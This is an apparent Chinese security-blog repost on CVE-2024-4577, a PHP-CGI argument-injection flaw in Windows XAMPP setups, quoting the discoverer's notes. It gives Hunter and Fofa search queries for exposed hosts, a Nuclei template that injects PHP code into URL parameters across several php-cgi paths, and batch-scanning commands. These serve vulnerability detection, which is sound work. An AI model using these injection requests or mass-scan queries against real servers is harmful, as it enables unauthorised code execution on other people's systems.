CVE-2024-4577 – PHP CGI 参数注入漏洞批量(复现)Nuclei 模板
CVE-2024-4577 – PHP CGI 参数注入漏洞批量(复现)Nuclei 模板
Ots安全 2024-06-08 14:22
CVE-2024-4577 – 又一个 PHP RCE:让 PHP-CGI 参数注入再次伟大!
这是我在准备Black Hat USA演讲时发现的一个附带故事/额外漏洞。我相信大部分细节已经在官方公告中涵盖 (应该很快就会发布)。尽管随着时间的推移,PHP-CGI 已逐渐被淘汰,但此漏洞默认会影响Windows 版 XAMPP,允许未经身份验证的攻击者通过特定字符序列在远程 XAMPP 服务器上执行任意代码。
鉴于 PHP 和 XAMPP 在网络生态系统中的广泛使用,我敦促大家检查自己是否受到影响并相应地更新系统。请参阅DEVCORE 发布的安全警报 以了解缓解措施。
这个漏洞非常简单,但这也是它有趣的地方。谁会想到,一个经过 12 年审查并被证明安全的补丁,会因为Windows 的一个小功能而被绕过?我相信这个功能可能会导致更多的潜在漏洞。如果你使用这种技术,别忘了参考这篇文章!https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ucoderef/d1980631-6401-428e-a49d-d71394be7da8😉
此漏洞由 DEVCORE (@d3vc0r3) 的 Orange Tsai (@orange_8361) 发现。请务必关注他的出色研究,我们的角色只是重现和开发此问题的漏洞。安全警报:CVE-2024-4577 PHP CGI 参数注入漏洞
概述 CVE-2024-4577 是 PHP 中的一个严重漏洞,影响 CGI 配置,允许攻击者通过精心设计的 URL 参数执行任意命令。
受影响的版本
– Windows 上使用 的 PHP 7.4.29 和 8.0.19 之前的版本php-cgi。
鹰图:
web.body="XAMPP"
Fofa:
product="XAMPP"
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE2024_EXP_TEST_1337" indicating a successful injection.
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
- "{{BaseURL}}/cgi-bin/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
- "{{BaseURL}}/php-cgi/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
- "{{BaseURL}}/php-cgi/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
- "{{BaseURL}}/index.php?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
matchers:
- type: word
words:
- "CVE2024_EXP_TEST_1337"
nuclei -t CVE-2024-4577.yaml -u
nuclei -l XXXX.TXT -t CVE-2024-4577.yaml
https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template/tree/main
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里